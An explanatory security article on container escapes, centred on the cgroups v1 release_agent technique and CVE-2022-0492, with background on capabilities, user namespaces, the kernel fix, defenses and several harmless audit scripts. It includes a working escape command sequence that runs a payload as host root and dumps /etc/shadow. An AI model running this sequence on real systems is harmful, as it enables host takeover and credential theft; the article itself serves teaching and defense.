How a Container Escape Works: The cgroups v1 release_agent Technique

A container escape happens when a process running inside a container breaks out of its restricted view of the system and starts acting on the host directly, usually as root. The reason this is even possible comes down to one fact people forget: a container is not a virtual machine. It is an ordinary Linux process that the kernel has wrapped in restricted namespaces and cgroups, and that process shares the exact same kernel as the host and every other container on the box. There is no hypervisor in between. This post walks one specific, real escape end to end: the cgroups v1 release_agent technique and the missing permission check tracked as CVE-2022-0492. It then steps back to the wider family of escapes that all rely on the same shared kernel boundary.

Why a container escape is possible at all

Start with what a container actually is, because the whole escape hinges on it. When you run docker run or start a pod, you do not boot a second machine. The kernel takes a normal process and changes what it can see. Namespaces give it a private view of process IDs, mount points, network interfaces, and user IDs, so from inside it looks like the process owns the system. Cgroups (control groups) cap how much CPU, memory, and IO it can use. Capabilities and seccomp filters trim which privileged operations and syscalls it is allowed to make. Stack those together and you get isolation that feels like a separate machine.

But every one of those layers is enforced by the same kernel the host runs. A virtual machine gets a virtual CPU and virtual hardware from a hypervisor, and the guest kernel is genuinely separate; to escape a VM you have to defeat the hypervisor itself. A container has none of that. The isolation is just bookkeeping inside one shared kernel. So if you can reach a kernel interface that was never namespaced, or you hold a capability that the kernel trusts more than it should, or the kernel has a bug you can hit from inside, the boundary is not a wall. It is a convention, and a convention can be broken.

That is the mental model for the rest of this post. The container assumes the kernel will keep enforcing its restricted view. CVE-2022-0492 is what happens when one kernel interface forgets to check who is allowed to touch it.

It is worth being precise about capabilities here, because the whole vulnerability turns on a subtlety in how they work. A capability is a slice of root’s power that the kernel can hand out one piece at a time instead of granting everything at once. CAP_NET_BIND_SERVICE lets a process bind a port below 1024. CAP_SYS_ADMIN is the grab bag that covers mounting filesystems, setting hostnames, and a long list of other administrative actions, which is why it is often described as the new root. A default container runtime hands a container a deliberately small set and drops the dangerous ones. The kernel then checks, at the moment of each privileged action, whether the calling process holds the capability that action requires. The escape we are about to walk is, at bottom, a story about a CAP_SYS_ADMIN check that the kernel never made against the right namespace.
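As a rough illustration of what holding a capability looks like from userspace, the sketch below tests a single bit of a capability mask such as the CapEff value in /proc/self/status. The helper name has_cap is invented for this example. Bit 21 is CAP_SYS_ADMIN in linux/capability.h, and a80425fb is the effective mask commonly reported inside a default Docker container, which is an assumption about your runtime rather than a guarantee.

```shell
#!/bin/sh
# has_cap MASK BIT: succeed if bit number BIT is set in the hex mask MASK.
# (has_cap is a hypothetical helper, not a standard tool.)
has_cap() {
    mask=$1
    bit=$2
    [ $(( (0x$mask >> $bit) & 1 )) -eq 1 ]
}

CAP_SYS_ADMIN=21   # bit number from linux/capability.h

# Inspect the effective capability set of the current process, if available.
if [ -r /proc/self/status ]; then
    cap_eff=$(awk '/^CapEff:/ { print $2 }' /proc/self/status)
    if [ -n "$cap_eff" ]; then
        if has_cap "$cap_eff" "$CAP_SYS_ADMIN"; then
            echo "CAP_SYS_ADMIN present (CapEff=$cap_eff)"
        else
            echo "CAP_SYS_ADMIN absent (CapEff=$cap_eff)"
        fi
    fi
fi
```

Run inside a container, this only reports what the process holds in its own user namespace, which is exactly the nuance the rest of this post depends on.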

The cgroup v1 release_agent mechanism

To understand the escape you first have to understand a perfectly legitimate cgroups feature that was never meant to be reachable from inside a container.

What release_agent and notify_on_release do

In cgroups version 1, every control group can carry two special files. The first is notify_on_release, a flag set to 0 or 1. The second is release_agent, which lives at the root of a cgroup hierarchy and holds a path to a program. The deal is simple. When notify_on_release is set to 1 on a cgroup and the last process in that cgroup exits, leaving it empty, the kernel runs the program named in release_agent to clean up. This is a real housekeeping mechanism documented in the kernel cgroups manual page. It exists so userspace can react when a group empties out.
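To check whether this interface exists on a given machine at all, one option is to look for cgroup v1 hierarchies in /proc/mounts, where v1 mounts have filesystem type cgroup and v2 mounts have type cgroup2. The sketch below is an audit aid under that assumption; the function name list_cgroup_v1_mounts is made up for illustration.

```shell
#!/bin/sh
# list_cgroup_v1_mounts FILE: print "mountpoint options" for every cgroup v1
# mount in a /proc/mounts-style file (hypothetical helper name).
list_cgroup_v1_mounts() {
    awk '$3 == "cgroup" { print $2, $4 }' "$1"
}

# Report each v1 hierarchy and, where readable, its current release_agent.
if [ -r /proc/mounts ]; then
    list_cgroup_v1_mounts /proc/mounts | while read -r mountpoint options; do
        agent_file="$mountpoint/release_agent"
        if [ -r "$agent_file" ]; then
            echo "$mountpoint ($options): release_agent='$(cat "$agent_file")'"
        else
            echo "$mountpoint ($options): release_agent not readable here"
        fi
    done
fi
```

On a host that uses only cgroups v2 the loop prints nothing, because no mount of type cgroup exists.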

The critical detail is who runs that program and where. The kernel invokes the release_agent binary itself, from the host context, as a fully privileged root process with all capabilities, in the host’s namespaces. It is not run inside the container. It is run by the kernel on the host. So if an attacker inside a container can write a path of their choosing into a release_agent file and then cause a cgroup to empty, the kernel will execute their chosen program as root on the host. That is the entire escape in one sentence. Everything else is about getting permission to write that file.

The capability that was supposed to guard it

Writing to release_agent is obviously dangerous, so it is supposed to require a capability. The relevant capability is CAP_SYS_ADMIN, the broad administrative capability that container runtimes strip from containers by default precisely because it is so powerful. A normal Docker or Kubernetes container does not hold CAP_SYS_ADMIN, so under default settings it cannot write release_agent, and the housekeeping feature stays a housekeeping feature.

For years that was the assumed boundary. If you wanted to abuse release_agent, you needed CAP_SYS_ADMIN, and if you had CAP_SYS_ADMIN you were already a heavily privileged container that could do plenty of damage anyway. The interesting question, and the one CVE-2022-0492 answers, is whether a container could obtain a working CAP_SYS_ADMIN over a cgroup mount without the host ever granting it.

The classic escape with a privileged container

It helps to see the abuse in its original, non-vulnerability form first, because the vulnerability simply removes the precondition. Picture our invented note-taking service, Acme Notes, which runs each customer’s background jobs in a container. Suppose an attacker has found a way to run as root inside one of those job containers, and the container was started with --privileged, so it holds CAP_SYS_ADMIN. The escape is a short sequence:

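# Mount a cgroup v1 hierarchy (rdma controller) and create a child cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# Ask the kernel to run release_agent when the child becomes empty
echo 1 > /tmp/cgrp/x/notify_on_release
# Host-side path of this container's filesystem (the overlay upperdir)
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Payload script, written inside the container
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
# Writing 0 moves the writing shell into x; when it exits, x is empty
sh -c "echo 0 > /tmp/cgrp/x/cgroup.procs"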

Read it top to bottom. You mount a cgroup v1 controller (the rdma controller is a common pick) so its hierarchy is writable. You make a child cgroup x and turn on notify_on_release for it. You find the container’s path on the host filesystem by reading the overlay mount info, then write host_path/cmd into release_agent, so the kernel will look for the agent at a path that resolves to a file inside your container. You drop a small script at /cmd that does whatever you want, here dumping the host’s /etc/shadow back to a place you can read. Finally you move a short-lived shell into the child cgroup by writing 0, which cgroups v1 treats as shorthand for the writing process itself, to its cgroup.procs, and let that shell exit, emptying the cgroup. The kernel sees the empty group, reads release_agent, and runs /cmd as root on the host. You just executed code outside the container.

The kernel was never tricked into running the wrong file. It ran exactly the file it was told to, as root, on the host, because nothing checked that the process which named that file had any business naming it.

CVE-2022-0492: the missing check

The classic technique above needs a privileged container with CAP_SYS_ADMIN. CVE-2022-0492 is the discovery that an unprivileged container could reach the same write through a back door, because the kernel’s permission check on release_agent was wrong.

What the researchers found

The vulnerability was disclosed in early 2022 by Yiqi Sun and Kevin Wang, with the most detailed public writeup published by Palo Alto Networks’ Unit 42 research team. The flaw lived in the cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c. That function is what runs when something writes to a release_agent file, and it was supposed to confirm the writer was sufficiently privileged before accepting the new path. It did not. The function failed to verify that the writing process held CAP_SYS_ADMIN in the initial user namespace. The official CVE record for CVE-2022-0492 describes it as allowing the cgroups v1 release_agent feature to escalate privileges and bypass namespace isolation, and NVD scores it CVSS v3.1 7.8, high severity.

What makes the finding sharp is that the underlying release_agent abuse was already public and understood as a privileged container trick. The contribution was noticing that user namespaces had quietly changed the threat model: a feature whose guard assumed only a genuinely privileged process could ever reach it was now reachable by any process that could spin up its own user namespace and call its bluff. The bug had reportedly been present since the relevant code path was introduced years earlier, sitting in plain sight, dangerous only once unprivileged user namespaces became common enough to weaponize. That is the recurring texture of this class of flaw. Nothing crashed, nothing leaked, the code did exactly what it said. It just trusted the wrong namespace.

Why an unprivileged user namespace is the key

This is the part that turns a missing check into a real escape. Linux user namespaces let an unprivileged process create a new user namespace in which it is root and holds a full set of capabilities, including CAP_SYS_ADMIN, but only over resources owned by that new namespace. The whole point of user namespaces is that this capability is local and fake from the host’s point of view. You are root in your little bubble; the host still sees you as nobody. Inside that new user namespace you are allowed to create new mount and cgroup namespaces and mount a fresh cgroup v1 hierarchy, and within that hierarchy you have a writable release_agent file.
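Whether an unprivileged process can create a user namespace at all depends on host configuration. The sketch below reads two sysctls and reduces them to a one-word verdict. /proc/sys/user/max_user_namespaces is an upstream kernel setting, while /proc/sys/kernel/unprivileged_userns_clone exists only on kernels carrying a distribution patch (Debian and Ubuntu, for instance), so treat its absence as normal. The function name userns_verdict and its verdict strings are invented here, and other restrictions such as LSM policy are not covered.

```shell
#!/bin/sh
# userns_verdict MAX CLONE: classify user namespace availability.
#   MAX   = contents of /proc/sys/user/max_user_namespaces ("" if missing)
#   CLONE = contents of /proc/sys/kernel/unprivileged_userns_clone ("" if missing)
# (hypothetical helper; the verdict strings are this example's own)
userns_verdict() {
    max=$1
    clone=$2
    if [ -z "$max" ]; then
        echo "unknown"
    elif [ "$max" = "0" ]; then
        echo "disabled"            # nobody can create user namespaces
    elif [ "$clone" = "0" ]; then
        echo "privileged-only"     # distro knob blocks unprivileged callers
    else
        echo "enabled"
    fi
}

# read_sysctl FILE: print the file's contents, or nothing if it is missing.
read_sysctl() {
    if [ -r "$1" ]; then cat "$1"; fi
}

max=$(read_sysctl /proc/sys/user/max_user_namespaces)
clone=$(read_sysctl /proc/sys/kernel/unprivileged_userns_clone)
echo "unprivileged user namespaces: $(userns_verdict "$max" "$clone")"
```

A verdict of enabled does not mean a container is exploitable; it only means the first ingredient of the escape is available.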

Now the two pieces meet. The attacker holds CAP_SYS_ADMIN, but only in the new user namespace, which should not count for a host-level action like setting a release agent. The kernel’s job in cgroup_release_agent_write was to notice that and refuse. Because the check was missing, the kernel accepted the write from a process whose CAP_SYS_ADMIN was the local, namespaced, supposedly harmless kind. The attacker then runs the same notify_on_release sequence, empties the cgroup, and the kernel dutifully executes their script as real root on the host. An unprivileged container, given that user namespaces are enabled and no extra hardening blocks the steps, escapes to the host.

The distinction the kernel missed is the difference between two functions with very similar names. ns_capable asks whether the caller holds a capability relative to one particular user namespace, a test that a process which just created its own user namespace always passes for that namespace, because it minted itself a full capability set when it created it. capable asks whether the caller holds the capability in the host’s initial user namespace, the one no unprivileged process can fake its way into. The release agent write must demand the second kind, because the program it stores gets run as host root. The vulnerable code effectively settled for the first kind, or for no kind at all, which is why a process that was root only inside its own bubble could set a file that the kernel would then honor with the real thing. The gap between those two questions is the entire CVE.
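The difference between the two questions can be shown with a deliberately tiny model. This is not kernel code: it flattens the namespace hierarchy to a host namespace called init plus unrelated child namespaces, and the names toy_ns_capable, toy_capable, and attacker_ns are invented for the illustration. The one real relationship it mirrors is that capable(cap) is the same test as ns_capable against the initial user namespace.

```shell
#!/bin/sh
# toy_ns_capable PROC_NS TARGET_NS: does a process holding a full capability
# set in PROC_NS hold it relative to TARGET_NS? In this flattened toy model,
# host-level capabilities apply everywhere, and namespaced capabilities apply
# only to the namespace they were minted in.
toy_ns_capable() {
    proc_ns=$1
    target_ns=$2
    [ "$proc_ns" = "init" ] || [ "$proc_ns" = "$target_ns" ]
}

# toy_capable PROC_NS: the stricter question, always asked against "init".
toy_capable() {
    toy_ns_capable "$1" init
}

# Compare a host root process with a process that is root only in attacker_ns.
for proc_ns in init attacker_ns; do
    if toy_ns_capable "$proc_ns" attacker_ns; then local_check=allow; else local_check=deny; fi
    if toy_capable "$proc_ns"; then host_check=allow; else host_check=deny; fi
    echo "process in $proc_ns: ns_capable(attacker_ns)=$local_check capable()=$host_check"
done
```

The process that is root only in attacker_ns passes the namespace-local question and fails the host question, which is the outcome the release agent write needed to enforce.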

One more nuance makes the escape practical rather than theoretical. The attacker has to name a program the kernel can actually find and run from the host context. Because the kernel resolves the release_agent path on the host, the attacker reads the container’s location on the host filesystem out of the mount information, usually the overlay upperdir, and writes a path that lands inside files they already control from within the container. So the script the kernel executes as root is a file the attacker wrote inside the container, reached by its true host path. No file is smuggled across the boundary; the same bytes are simply addressed two ways.

This is fundamentally a privilege escalation dressed as a container escape. The container gains an authority it was never assigned by exploiting an interface that trusted a capability it should have distrusted.

The kernel fix

The fix is almost anticlimactically small, which is what makes it instructive. The patch landed in mainline as commit 24f6008564183aa120d07c03d9289519c2fe02af and added the check that should always have been there. Before accepting a write to release_agent, the function now confirms the caller is operating in the initial user namespace and holds genuine CAP_SYS_ADMIN, using capable(CAP_SYS_ADMIN) against the host’s init_user_ns rather than a namespace-local ns_capable check that a user namespace could satisfy. If the writer’s user namespace is not init_user_ns, or it lacks real CAP_SYS_ADMIN, the write is rejected with EPERM. That single distinction, host capability versus namespaced capability, is the whole bug and the whole fix. The fix shipped in 5.17 and was backported to the maintained stable trees.

The broader family of container escapes

The release_agent trick is one entry in a catalog, and it is worth knowing the neighbors, because they all share the shared kernel premise even when the specific door differs.

Privileged containers

A container started with --privileged is barely a container at all. It keeps almost all capabilities, including CAP_SYS_ADMIN, and it can see host devices. The classic release_agent escape works directly from such a container with no vulnerability required, and so do many other tricks, because a privileged container is one short step from being a host root shell. The lesson is that privileged is a decision to drop the boundary, not a convenience flag.

A mounted docker.sock

Mounting the Docker daemon socket, /var/run/docker.sock, into a container hands that container the ability to talk to the Docker daemon, which runs as root on the host. From inside, the process can ask the daemon to start a new container that mounts the host’s root filesystem and runs as root, then read or write anything on the host. There is no kernel bug here at all. The container was simply given a control channel to a privileged host service.
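A quick way to notice this exposure from inside a workload is to test whether a Unix socket exists at the usual daemon paths. The sketch below assumes the conventional locations /var/run/docker.sock and /run/docker.sock; a socket mounted at some other path would not be caught, and the helper name is_unix_socket is made up for the example.

```shell
#!/bin/sh
# is_unix_socket PATH: succeed if PATH exists and is a Unix domain socket.
# (hypothetical helper wrapping the standard "test -S" check)
is_unix_socket() {
    [ -S "$1" ]
}

# Conventional Docker daemon socket locations (an assumption, not exhaustive).
for candidate in /var/run/docker.sock /run/docker.sock; do
    if is_unix_socket "$candidate"; then
        echo "WARNING: Docker daemon socket reachable at $candidate"
    fi
done
```

Silence from this check only means the socket is not at a default path, so it complements a review of the container's mount configuration rather than replacing it.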

Exposed host mounts

Bind mounting sensitive host paths into a container, the host root, /etc, the Docker directory, or device nodes, gives the container direct reach into host state. Write access to the right host file, such as a script the host runs on a schedule or a configuration the host trusts, is escape enough. The boundary leaks wherever a writable path crosses it.

A vulnerable shared kernel

Because the kernel is shared, any kernel bug reachable from inside a container is a candidate escape. Dirty COW (CVE-2016-5195) and Dirty Pipe (CVE-2022-0847) are the famous examples: both let an unprivileged process overwrite files it should only be able to read, the first through a race in the kernel’s copy-on-write handling and the second through a flaw in how pipe buffers reference page cache memory, and both can be fired from inside a container to overwrite a host-owned file and gain root. A different flavor of the same family is a kernel use-after-free, where freed kernel memory is reclaimed with attacker-controlled data and the kernel then uses it as if it were still valid. The common thread is unmistakable: one kernel, shared by host and container, so a kernel bug is a host bug.

Defending against the release_agent escape

The good news is that the same hardening that blocks most of this family blocks the release_agent path too. Patch the kernel so cgroup_release_agent_write enforces the real capability check. Keep the default seccomp and the default AppArmor or SELinux profiles in place, because they deny the mount and write steps the exploit needs; Unit 42 noted the escape only works against containers running without those protections. Drop CAP_SYS_ADMIN and run unprivileged. Where you do not need them, disabling unprivileged user namespaces removes the mechanism that hands an unprivileged container its local CAP_SYS_ADMIN in the first place. And prefer cgroups v2, which does not carry the release_agent and notify_on_release interface in the form this exploit abuses. None of these is exotic. They are the defaults, and the escape mostly works where the defaults were removed.
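Some of these defaults can be verified from inside a running workload. The sketch below reads the Seccomp and NoNewPrivs fields from /proc/self/status and checks the filesystem type at /sys/fs/cgroup, where cgroup2fs indicates a cgroups v2 unified hierarchy. The helper names are invented for this example, and the stat -fc %T form assumes GNU coreutils (other stat implementations may differ).

```shell
#!/bin/sh
# status_field FILE NAME: print the value of field NAME from a
# /proc/<pid>/status-style file (hypothetical helper).
status_field() {
    awk -v key="$2:" '$1 == key { print $2 }' "$1"
}

# seccomp_mode_name N: translate the numeric Seccomp field into words.
seccomp_mode_name() {
    case $1 in
        0) echo disabled ;;
        1) echo strict ;;
        2) echo filter ;;
        *) echo unknown ;;
    esac
}

if [ -r /proc/self/status ]; then
    seccomp=$(status_field /proc/self/status Seccomp)
    nnp=$(status_field /proc/self/status NoNewPrivs)
    echo "seccomp: $(seccomp_mode_name "$seccomp")"
    echo "no_new_privs: ${nnp:-unknown}"
fi

# cgroup2fs here means the host exposes the v2 unified hierarchy.
fs_type=$(stat -fc %T /sys/fs/cgroup 2>/dev/null || echo unknown)
echo "/sys/fs/cgroup filesystem: $fs_type"
```

A seccomp mode of disabled is the result worth chasing first, since it suggests the workload was started without the runtime's default profile.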

The assumption that breaks

Underneath all of it sits one assumption, and it is the same assumption every time. A container assumes the kernel boundary holds. It behaves as though its namespaces and cgroups are a wall around it, as solid as the virtual hardware around a VM. But the kernel is not a wall around the container. It is the floor under both the container and the host, one shared surface, and the container is standing on it right next to everything it is supposed to be isolated from. The moment a single capability is trusted too far, or a single kernel interface forgets to ask who is calling, or a single host path is left writable across the line, the boundary was never there. It was a set of checks, and one missing check, the absent CAP_SYS_ADMIN test in cgroup_release_agent_write, was enough to collapse the whole thing into a root shell on the host.

That is the shape of bug you only find by asking what each layer trusts and why it still trusts it, rather than by scanning for a known bad pattern. The vulnerability was not a crash or a corrupted pointer. It was an interface that assumed a capability meant what it used to mean before user namespaces made capabilities local and cheap. Finding it meant questioning a boundary everyone treated as settled. That is exactly the kind of assumption an autonomous researcher built to test assumptions is meant to catch: not the malformed input, but the quiet premise that the wall is a wall. Read more about that approach on our about page.

Frequently asked questions

What is a container escape?

A container escape is when a process inside a container breaks out of its restricted namespaces and cgroups and acts on the host directly, usually as root. It is possible because a container is not a virtual machine; it is an ordinary process that shares the same kernel as the host, so one over-trusted capability or one writable host interface can collapse the boundary. The Unit 42 analysis of CVE-2022-0492 walks a real example end to end.

How does the cgroups v1 release_agent escape work?

In cgroups v1 a hierarchy can hold a release_agent file naming a program the kernel runs as root on the host when a cgroup with notify_on_release set to 1 becomes empty. If an attacker can write a path into release_agent and then empty a cgroup, the kernel executes their chosen script as root outside the container. The man7 cgroups documentation describes the legitimate release agent and notify_on_release mechanism this abuses.

What did CVE-2022-0492 actually break?

The cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c failed to verify that the process writing release_agent held real CAP_SYS_ADMIN in the initial user namespace. An unprivileged container could create a user namespace where it holds a local, supposedly harmless CAP_SYS_ADMIN, mount a writable cgroupfs, and write the file the kernel trusted. The flaw is documented at CVE-2022-0492 and scored CVSS 7.8 high by NVD.

How do you defend against this container escape?

Patch the kernel so cgroup_release_agent_write enforces the real capability check (the fix landed in commit 24f6008564183aa120d07c03d9289519c2fe02af), keep the default seccomp and AppArmor or SELinux profiles, drop CAP_SYS_ADMIN, avoid privileged containers and mounted docker.sock, and disable unprivileged user namespaces where you do not need them. The Sysdig writeup on CVE-2022-0492 covers detection and mitigation.